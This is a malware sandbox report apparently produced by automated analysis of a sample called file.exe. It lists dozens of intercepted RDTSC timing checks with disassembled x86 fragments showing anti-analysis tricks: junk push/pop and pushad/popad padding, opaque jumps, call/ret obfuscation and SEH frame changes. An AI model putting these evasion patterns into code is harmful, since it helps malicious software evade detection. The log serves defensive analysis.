Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2D60 second address: 12F2DBF instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 push ebx; 0x00000005 pop ebx; 0x00000006 jmp 00007FF6744C8CA0h; 0x0000000b pushad; 0x0000000c jne 00007FF6744C8C96h; 0x00000012 jmp 00007FF6744C8CA0h; 0x00000017 popad; 0x00000018 popad; 0x00000019 push eax; 0x0000001a push edx; 0x0000001b pushad; 0x0000001c jmp 00007FF6744C8CA1h; 0x00000021 jne 00007FF6744C8C96h; 0x00000027 jmp 00007FF6744C8CA5h; 0x0000002c popad; 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2EEF second address: 12F2EF4 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop ecx; 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2EF4 second address: 12F2F03 instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 pushad; 0x00000004 popad; 0x00000005 pop eax; 0x00000006 pushad; 0x00000007 jns 00007FF6744C8C96h; 0x0000000d push eax; 0x0000000e push edx; 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2F03 second address: 12F2F09 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 push eax; 0x00000005 push edx; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F3086 second address: 12F30A8 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pushad; 0x00000005 popad; 0x00000006 jmp 00007FF6744C8C9Fh; 0x0000000b popad; 0x0000000c jnp 00007FF6744C8C9Ch; 0x00000012 jng 00007FF6744C8C96h; 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6FE5 second address: 12E6FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2C96 second address: 12C2CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6744C8CA0h 0x00000009 pushad 0x0000000a jmp 00007FF6744C8CA2h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF6744C8C9Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2CCF second address: 12C2CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3899 second address: 12F38C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF6744C8C96h 0x0000000a jmp 00007FF6744C8CA7h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F38C0 second address: 12F38C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F38C8 second address: 12F38CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F38CE second address: 12F3904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FF674E409B8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FF674E409BCh 0x00000016 push ebx 0x00000017 jng 00007FF674E409B6h 0x0000001d jmp 00007FF674E409C2h 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3904 second address: 12F391C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6744C8CA3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3A4F second address: 12F3A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF674E409B6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5444 second address: 12F5469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5469 second address: 12F5483 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF674E409B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF674E409BAh 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7B60 second address: 12F7B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FF6744C8CA7h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF6744C8CA1h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7B99 second address: 12F7BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF674E409C9h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FF674E409C0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7BD4 second address: 12F7BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FEA97 second address: 12FEAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF674E409B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FEAA3 second address: 12FEACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF6744C8CA7h 0x0000000e jmp 00007FF6744C8C9Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDDA1 second address: 12FDDB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDDB1 second address: 12FDDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6744C8C9Ch 0x00000009 jmp 00007FF6744C8CA2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF22 second address: 12FDF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF674E409C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF3D second address: 12FDF7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF6744C8C96h 0x00000009 jmp 00007FF6744C8CA6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF6744C8CA9h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF7A second address: 12FDF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF7E second address: 12FDFA6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007FF6744C8CA3h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE729 second address: 12FE73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409BCh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE73E second address: 12FE745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE8E9 second address: 12FE912 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007FF674E409B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FF674E409C8h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301549 second address: 130154D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130154D second address: 1301583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FF674E409C9h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF674E409BFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301583 second address: 13015D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007FF6744C8C96h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jno 00007FF6744C8CA4h 0x00000026 pop eax 0x00000027 mov esi, dword ptr [ebp+122D3940h] 0x0000002d call 00007FF6744C8C99h 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jg 00007FF6744C8C96h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13015D0 second address: 1301603 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FF674E409BCh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF674E409C7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301603 second address: 1301607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301607 second address: 130160D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130160D second address: 1301663 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF6744C8C9Ch 0x00000008 jnc 00007FF6744C8C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FF6744C8CA7h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jnl 00007FF6744C8C98h 0x00000022 jmp 00007FF6744C8C9Ch 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF6744C8C9Dh 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301663 second address: 1301668 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13017E3 second address: 1301801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13019C5 second address: 13019CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1302315 second address: 1302319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1302319 second address: 130234E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FF674E409B8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push eax 0x00000027 pushad 0x00000028 jnp 00007FF674E409B8h 0x0000002e pushad 0x0000002f popad 0x00000030 push ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130261D second address: 1302627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13028BA second address: 13028BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13037DC second address: 13037E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1303644 second address: 130364A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13053A0 second address: 13053A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13053A4 second address: 13053AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305061 second address: 130507E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13053AE second address: 13053B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130507E second address: 130509B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF6744C8C96h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pushad 0x00000015 js 00007FF6744C8C96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307417 second address: 130741B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130741B second address: 13074A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007FF6744C8C9Dh 0x0000000d ja 00007FF6744C8C9Ch 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FF6744C8C98h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr [ebp+124555E7h], ebx 0x00000036 jmp 00007FF6744C8CA0h 0x0000003b push 00000000h 0x0000003d xchg eax, ebx 0x0000003e jg 00007FF6744C8CADh 0x00000044 push eax 0x00000045 jc 00007FF6744C8CA0h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e pop eax 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307E61 second address: 1307E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307E65 second address: 1307E7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A9ED second address: 130AA05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF674E409BAh 0x0000000c jo 00007FF674E409BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D054 second address: 130D05A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E134 second address: 130E13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D05A second address: 130D05F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E13F second address: 130E143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D05F second address: 130D065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E143 second address: 130E147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F0B2 second address: 130F0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FF6744C8C9Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDBDA second address: 12BDBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D065 second address: 130D0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007FF6744C8C98h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 nop 0x00000017 jbe 00007FF6744C8C99h 0x0000001d movsx edi, cx 0x00000020 mov bx, E622h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov dword ptr [ebp+122D3159h], edi 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 jmp 00007FF6744C8CA4h 0x0000003d jmp 00007FF6744C8CA2h 0x00000042 mov eax, dword ptr [ebp+122D0D41h] 0x00000048 push FFFFFFFFh 0x0000004a mov dword ptr [ebp+122D34F5h], edi 0x00000050 nop 0x00000051 pushad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F0C3 second address: 130F0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13117A4 second address: 13117AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13146F2 second address: 13146F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131376F second address: 1313773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13146F7 second address: 13147A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF674E409C9h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FF674E409B8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007FF674E409BBh 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FF674E409B8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 je 00007FF674E409BCh 0x0000004f mov ebx, dword ptr [ebp+122D1B23h] 0x00000055 push 00000000h 0x00000057 mov ebx, edi 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b jmp 00007FF674E409C5h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FF674E409C5h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313773 second address: 1313793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF6744C8C96h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13147A0 second address: 13147A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313793 second address: 13137AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007FF6744C8C9Dh 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131580B second address: 1315811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1315811 second address: 1315849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jg 00007FF6744C8C9Eh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122DB830h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 jmp 00007FF6744C8C9Dh 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159B9 second address: 13159D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131691E second address: 1316992 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bl, F0h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, dword ptr [ebp+122D1B9Eh] 0x0000001a je 00007FF6744C8C97h 0x00000020 stc 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1AD0h], ebx 0x0000002e mov eax, dword ptr [ebp+122D16E5h] 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FF6744C8C98h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e add dword ptr [ebp+122D361Fh], edx 0x00000054 sub dword ptr [ebp+122D2AADh], esi 0x0000005a push FFFFFFFFh 0x0000005c sub ebx, dword ptr [ebp+122D1AD6h] 0x00000062 push eax 0x00000063 pushad 0x00000064 jns 00007FF6744C8C98h 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159D2 second address: 13159D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
